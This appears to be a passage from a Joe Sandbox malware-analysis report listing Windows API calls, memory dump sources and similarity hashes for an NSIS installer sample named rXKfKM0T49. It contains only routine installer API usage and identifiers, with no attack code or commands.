                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
                                                                                                            • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":
                                                                                                            • API String ID: 589700163-165019052
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1941528284-0
                                                                                                            • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
APIs
• GetDlgItem.USER32(?,?), ref: 00401D63
• GetClientRect.USER32(00000000,?), ref: 00401D70
• LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
• SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
• DeleteObject.GDI32(00000000), ref: 00401DAE
Memory Dump Source
• Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
• Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
• Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
• Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
Strings
Memory Dump Source
• Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
• Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
• Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
• Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
APIs
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
Memory Dump Source
• Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: Close$Enum
• String ID:
• API String ID: 464197530-0
• Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
• Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
• Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
• Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
APIs
• CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
• GetLastError.KERNEL32 ref: 00405976
• SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
• GetLastError.KERNEL32 ref: 00405995
Memory Dump Source
• Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID:
• API String ID: 3449924974-0
• Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
• Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
• Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
• Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
APIs
  • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
  • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0,00000000), ref: 00405D76
  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
• lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0,00000000), ref: 00405E1E
• GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0), ref: 00405E2E
Strings
Memory Dump Source
• Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: 0_B
• API String ID: 3248276644-2128305573
• Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
• Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
• Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
• Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
APIs
• IsWindowVisible.USER32(?), ref: 004053F3
• CallWindowProcW.USER32(?,?,?,?), ref: 00405444
  • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
Strings
Memory Dump Source
• Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
• Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
• Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
• Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
APIs
• GetTickCount.KERNEL32 ref: 00405F2B
• GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,76F93420,004036EF), ref: 00405F46
Strings
Memory Dump Source
• Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
• Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
• Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
• Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
• CloseHandle.KERNEL32(?), ref: 00405A07
Strings
• Error launching installer, xrefs: 004059E4
Memory Dump Source
• Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
• Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
• Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
• Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
Memory Dump Source
• Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
• Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
• Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
• Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
Memory Dump Source
• Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
• Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
